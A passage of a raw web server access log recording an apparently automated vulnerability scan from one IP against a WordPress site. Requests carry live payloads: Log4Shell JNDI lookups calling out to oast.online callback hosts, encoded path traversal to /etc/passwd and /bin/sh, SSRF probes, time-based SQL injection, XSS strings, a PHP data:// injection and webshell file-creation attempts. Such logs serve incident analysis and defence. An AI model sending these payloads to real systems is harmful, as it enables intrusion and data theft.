Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.21" 154.84.62.234 - - [24/Apr/2025:07:34:01 -0400] "POST /delete_cart_goods.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:07:34:01 -0400] "POST /action.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:07:34:32 -0400] "POST /homeaction.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0" 154.84.62.234 - - [24/Apr/2025:07:35:17 -0400] "POST /TransferredOutModal.php?modfunc=detail HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:35:17 -0400] "POST /index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.6.27" 154.84.62.234 - - [24/Apr/2025:07:35:49 -0400] "POST /api/graphql HTTP/1.1" 200 0 "https://mgrokokbet.id/-/graphql-explorer" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:36:11 -0400] "POST /cgi?2 HTTP/1.1" 200 0 "http://mgrokokbet.id/mainFrame.htm" "Mozilla/5.0 (Kubuntu; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:07:36:19 -0400] "POST /cgi?7 HTTP/1.1" 200 0 "http://mgrokokbet.id/mainFrame.htm" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:07:36:49 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:36:54 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:37:10 -0400] "POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:07:37:14 -0400] "GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1" 403 1242 "-" "-" 154.84.62.234 - - [24/Apr/2025:07:37:18 -0400] "GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1" 403 1242 "-" "-" 154.84.62.234 - - [24/Apr/2025:07:37:21 -0400] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 403 1242 "-" "-" 154.84.62.234 - - [24/Apr/2025:07:37:42 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:37:47 -0400] "POST /cas/v1/tickets/ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.9.26" 154.84.62.234 - - [24/Apr/2025:07:40:01 -0400] "GET /login.htm HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:07:40:10 -0400] "GET /formLoginAuth.htm?authCode=1&userName=admin&goURL&action=login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:07:40:10 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" 154.84.62.234 - - [24/Apr/2025:07:40:14 -0400] "POST /Side.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0" 154.84.62.234 - - [24/Apr/2025:07:40:23 -0400] "GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name=2w9rffcVZkP0Ev1mOs2hSLzHhR5.php:aaa HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:40:48 -0400] "POST /classes/Login.php?f=login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:07:40:51 -0400] "GET /STATE_ID/123/agentLogUploader HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:40:53 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:41:13 -0400] "GET /?x=${jndi:ldap://${:-754}${:-243}.${hostName}.uri.d04qr7ij4pq19d75k490ejfdzetxwmp8b.oast.online/a} HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:07:41:13 -0400] "GET /login/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0" 154.84.62.234 - - [24/Apr/2025:07:41:19 -0400] "GET / HTTP/1.1" 403 1242 "${jndi:ldap://${:-754}${:-243}.${hostName}.referer.d04qr7ij4pq19d75k490ercmu5tkc4ss3.oast.online}" "${jndi:ldap://${:-754}${:-243}.${hostName}.useragent.d04qr7ij4pq19d75k4903m4yb58ap5htf.oast.online}" 154.84.62.234 - - [24/Apr/2025:07:42:15 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:42:25 -0400] "GET /client/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:42:33 -0400] "GET /changePassword?username=administrator HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:07:43:04 -0400] "GET /api/blade-user/user-list HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:43:04 -0400] "GET /api/blade-user/user-list HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:43:04 -0400] "GET /api/blade-user/user-list HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.7.19" 154.84.62.234 - - [24/Apr/2025:07:43:16 -0400] "GET /language/lang HTTP/1.1" 403 1242 "https://mgrokokbet.id" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0) AppleWebKit/616.3 (KHTML, like Gecko) Version/17.5.22 Safari/616.3" 154.84.62.234 - - [24/Apr/2025:07:43:23 -0400] "GET /?x=${jndi:ldap://127.0.0.1 HTTP/1.1" 403 1242 "${jndi:ldap://127.0.0.1#.${hostName}.referer.d04qr7ij4pq19d75k490iohgepw1iw591.oast.online}" "${jndi:ldap://127.0.0.1#.${hostName}.useragent.d04qr7ij4pq19d75k490f6a73nk1snzx1.oast.online}" 154.84.62.234 - - [24/Apr/2025:07:43:25 -0400] "POST /ddns_check.ccp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:07:45:05 -0400] "GET /index.php?p=member&destination HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.2.26" 154.84.62.234 - - [24/Apr/2025:07:45:25 -0400] "GET /scp/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:07:45:40 -0400] "GET /2w9rfVs15FVzhlYzS7v8qe19Rz4.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:07:45:45 -0400] "PUT /2w9rfVs15FVzhlYzS7v8qe19Rz4.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:78.0) Gecko/20100101 Firefox/78.0" 154.84.62.234 - - [24/Apr/2025:07:45:50 -0400] "GET /2w9rfVs15FVzhlYzS7v8qe19Rz4.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:48:52 -0400] "POST /apply.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:07:49:31 -0400] "POST /wp-admin/admin.php?page=vfb-export HTTP/1.1" 200 0 "https://mgrokokbet.id/wp-admin/admin.php?page=vfb-export" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:49:59 -0400] "PUT /cgi-bin/gTu3TT.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:07:50:10 -0400] "GET /cgi-bin/gTu3TT.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:50:23 -0400] "PUT /cgi-bin/TtQp2L.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0, Win64, x64, rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:07:50:29 -0400] "DELETE /cgi-bin/TtQp2L.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.5.26" 154.84.62.234 - - [24/Apr/2025:07:50:49 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.4.21" 154.84.62.234 - - [24/Apr/2025:07:50:54 -0400] "GET /archive/download?file=file:///etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6" 154.84.62.234 - - [24/Apr/2025:07:50:58 -0400] "GET /archive/download?file=http://d04qr7ij4pq19d75k490qj966893pozai.oast.online/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:51:36 -0400] "GET /wp-admin/admin-ajax.php?action=woocs_get_products_price_html&woocs_in_order_currency=<img%20src%20onerror=alert(document.domain)> HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) LoiLoNote/19.0.0 Version/17.1.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:07:51:36 -0400] "GET /images/icons_title.gif HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:07:51:43 -0400] "DELETE /images/icons_title.gif HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/617.7 (KHTML, like Gecko) Version/17.3.74 Safari/617.7" 154.84.62.234 - - [24/Apr/2025:07:51:48 -0400] "GET /images/icons_title.gif HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:52:02 -0400] "POST / HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:07:52:01 -0400] "POST /?rest_route=/notificationx/v1/analytics HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:07:52:11 -0400] "GET /wp-content/plugins/embed-swagger/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:52:14 -0400] "GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 85.208.96.210 - - [24/Apr/2025:07:52:16 -0400] "GET /robots.txt HTTP/1.1" 200 83 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" 85.208.96.203 - - [24/Apr/2025:07:52:19 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" 154.84.62.234 - - [24/Apr/2025:07:52:23 -0400] "GET /wp-admin HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:07:52:27 -0400] "POST /wp-login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:52:31 -0400] "GET /wp-admin/admin.php?page=nsp_search&what1=%27+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0) AppleWebKit/618.25.8 (KHTML, like Gecko) Version/17.3 Safari/618.25.8" 154.84.62.234 - - [24/Apr/2025:07:52:49 -0400] "POST /wp-login.php?wlcms-action=preview HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:07:53:03 -0400] "GET /?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (SS; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:07:53:07 -0400] "GET /?p=1&xsg-provider=data://text/html,<\?php%20echo%20md5(\"CVE-2022-0346\");%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:07:53:21 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:53:28 -0400] "GET /user/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:07:54:15 -0400] "GET /?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20md5(999999999),null,null%20--%20g HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.7.19" 154.84.62.234 - - [24/Apr/2025:07:55:11 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:07:55:48 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:07:55:53 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:07:56:03 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:07:56:07 -0400] "GET /karma.js HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:56:14 -0400] "GET /?return_url=javascript:alert(document.domain) HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:07:57:01 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0" 154.84.62.234 - - [24/Apr/2025:07:57:10 -0400] "GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/2w9rfWFiMFalSjYLUJ7cDxbPcKM.svg HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/618.5.10 (KHTML, like Gecko) Version/17.5 Safari/618.5.10" 154.84.62.234 - - [24/Apr/2025:07:58:07 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:07:58:07 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:58:51 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.26" 154.84.62.234 - - [24/Apr/2025:07:58:57 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:07:59:19 -0400] "GET /wp-admin/admin-ajax.php?meta_ids=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&action=remove_post_meta_condition HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:07:59:58 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:00:19 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:08:00:56 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0" 154.84.62.234 - - [24/Apr/2025:08:01:03 -0400] "GET /wp-content/plugins/infographic-and-list-builder-ilist/assets/js/ilist_custom_admin.js HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:01:11 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; WOW64; rv:41.0) Gecko/20100101 Firefox/128.0 (x64 de)" 154.84.62.234 - - [24/Apr/2025:08:01:14 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0" 154.84.62.234 - - [24/Apr/2025:08:01:29 -0400] "GET /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B\"id\":\"1\"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:08:01:33 -0400] "GET /wp-admin/admin-ajax.php?action=get_monthly_timetable&month=1+AND+(SELECT+6881+FROM+(SELECT(SLEEP(6)))iEAn) HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:08:01:49 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0" 154.84.62.234 - - [24/Apr/2025:08:01:50 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:08:01:56 -0400] "GET /wp-content/plugins/documentor-lite/core/js/documentor.js HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0" 154.84.62.234 - - [24/Apr/2025:08:01:58 -0400] "GET /index.php?rest_route=/xs-donate-form/payment-redirect/3 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:02:24 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:08:02:45 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:03:24 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0" 154.84.62.234 - - [24/Apr/2025:08:04:03 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:04:03 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_1_8; en) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.4 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:05:51 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; WOW64; rv:41.0) Gecko/20100101 Firefox/128.0 (x64 de)" 154.84.62.234 - - [24/Apr/2025:08:05:57 -0400] "GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:06:04 -0400] "GET /user/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:07:04 -0400] "POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:07:04 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:07:09 -0400] "POST /?rest_route=/olistener/new HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:07:13 -0400] "GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/616.20.13 (KHTML, like Gecko) Version/17.7.74 Safari/616.20.13" 154.84.62.234 - - [24/Apr/2025:08:07:17 -0400] "GET /wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3--+- HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:08:28 -0400] "GET /user/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.8.19" 154.84.62.234 - - [24/Apr/2025:08:08:36 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.6.20" 154.84.62.234 - - [24/Apr/2025:08:08:43 